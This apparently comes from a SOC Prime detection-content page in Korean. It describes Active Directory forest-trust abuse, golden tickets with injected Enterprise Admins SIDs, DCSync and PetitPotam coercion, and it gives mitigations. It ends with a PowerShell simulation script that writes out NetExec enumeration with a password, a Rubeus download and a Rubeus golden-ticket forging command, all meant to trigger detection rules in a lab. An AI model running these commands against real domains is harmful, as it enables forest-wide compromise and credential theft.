SOC Prime Bias: 위험

01 Jul 2026 09:11 UTC

Active Directory 포리스트 트러스트 남용 및 차일드-투-루트 에스컬레이션

Author Photo
SOC Prime Team linkedin icon 팔로우
Active Directory 포리스트 트러스트 남용 및 차일드-투-루트 에스컬레이션
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

이 기술적 워크스루는 자식 도메인에서 도메인 관리자 권한을 가진 공격자가 포리스트 루트의 관리자 권한을 얻는 방법을 보여줍니다. 이 공격은 양방향 포리스트 내 신뢰와 관대한 SID 필터링을 남용하여 위조된 Kerberos 티켓에 엔터프라이즈 관리자 SID를 삽입합니다. 또한 PetitPotam과 같은 강제 방법이 기계 계정 티켓을 캡처하고 DCSync 공격을 가능하게 하는 방법을 설명합니다.

조사

이 보고서는 공격자가 시작하는 실험실 기반 참여를 설명합니다 pentest.ignite.local 자식 도메인. 워크플로에는 포리스트 신뢰를 열거하고 krbtgt 해시를 추출하고 SID 기록이 있는 골든 티켓을 위조한 후 상위 도메인에 대한 DCSync 공격을 실행하는 것이 포함됩니다. 또한 PetitPotam 강제 기법을 사용하는 보조 승격 경로도 시연됩니다. ignite.local 도메인.

완화

권장 완화 조치에는 모든 도메인 컨트롤러를 tier-zero 자산으로 취급하고 krbtgt 암호를 정기적으로 두 번 회전하는 것입니다. 조직은 트러스트에서 SID 필터링을 강제하고 제한 없는 위임을 비활성화하며 도메인 컨트롤러에서 인쇄 스풀러 서비스를 끄도록 해야 합니다. 추가 강화 단계로는 Kerberos 보호를 위한 Protected Users 그룹을 사용하고 비정상적인 DRSUAPI 복제 활동을 모니터링하는 것이 포함됩니다.

응답

DCSync 활동 또는 허가되지 않은 Kerberos 티켓 사용이 감지되면 대응자는 즉시 영향을 받은 도메인 컨트롤러를 격리하고 두 번의 krbtgt 암호 재설정을 시작해야 합니다. 엔터프라이즈 관리자 권한을 가진 모든 계정은 조사되어야 하며, 환경은 Rubeus 또는 PetitPotam과 같은 도구가 있는지 점검해야 합니다. 인증 로그 또한 비정상적인 기계 계정 행동과 강제 관련 이벤트를 검토해야 합니다.

공격 흐름

시뮬레이션 실행

필수 조건: 원활한 전송을 위한 전송 및 기준선 사전 비행 검사가 통과되어야 합니다.

합리적 추론: 이 섹션은 탐지 규칙을 트리거하기 위해 설계된 적의 기술(TTP)을 정확하게 실행하는 방법을 설명합니다. 명령과 설명은 식별된 TTP를 직접 반영해야 하며, 탐지 로직에 의해 예상되는 정확한 원격 측정값을 생성하는 것을 목표로 합니다. 추상적이거나 관련 없는 예는 오진으로 이어질 수 있습니다.

  • 공격 내러티브 및 명령: 적은 자식 도메인에서 유리한 지점을 얻었습니다 (pentest.ignite.local). 포리스트 루트로 승격하기 위해, 그들은 먼저 nxc (NetExec)을 사용하여 LDAP를 통해 도메인 컨트롤러를 나열하여 타겟 환경을 매핑합니다. 다음으로, 그들은 powershell 을 사용하여 Rubeus.exe 를 원격 공격자가 제어하는 서버에서 다운로드합니다. 마지막으로 그들은 Rubeus.exe 를 실행하여 골든 티켓을 위조합니다. 위조된 티켓은 포리스트 루트 도메인(SID: S-1-5-21-2964257136-1039789743-457275023)의 SID를 포함하여 공격자가 루트 도메인과 상호작용할 때 포리스트 관리자로 가장할 수 있게 합니다.

  • 회귀 테스트 스크립트:

    # 특정 Sigma 규칙을 트리거하기 위한 포리스트 신뢰 남용 시뮬레이션
    
    # 1. NetExec LDAP 나열 시뮬레이션
    # 주석: 'nxc'를 더미 실행을 통해 명령 줄 서명을 흉내 냅니다
    Start-Process "cmd.exe" -ArgumentList "/c nxc ldap -u raaz -p Password@2 --dc-list" -NoNewWindow
    
    # 2. PowerShell을 통한 Rubeus 다운로드 시뮬레이션
    # 이 문자열은 정확히 일치합니다: 'powershell wget http://Rubeus.exe -o Rubeus.exe'
    Start-Process "powershell.exe" -ArgumentList "wget http://Rubeus.exe -o Rubeus.exe" -NoNewWindow
    
    # 3. Rubeus 골든 티켓 위조 시뮬레이션
    # 이 문자열은 탐지 규칙에 필요한 정확한 복잡한 문자열과 일치합니다
    $rubeusCmd = "Rubeus.exe golden /rc4: /user:administrator /domain:pentest.ignite.local /sid:S-1-5-21-3430543386-541733547-1396883976 /sids:S-1-5-21-2964257136-1039789743-457275023-519 /outfile:ticket"
    Start-Process "cmd.exe" -ArgumentList "/c $rubeusCmd" -NoNewWindow
  • 정리 명령:

    # 다운로드한 Rubeus 파일 및 모든 더미 아티팩트 제거
    Remove-Item -Path "Rubeus.exe" -ErrorAction SilentlyContinue
    Remove-Item -Path "ticket" -ErrorAction SilentlyContinue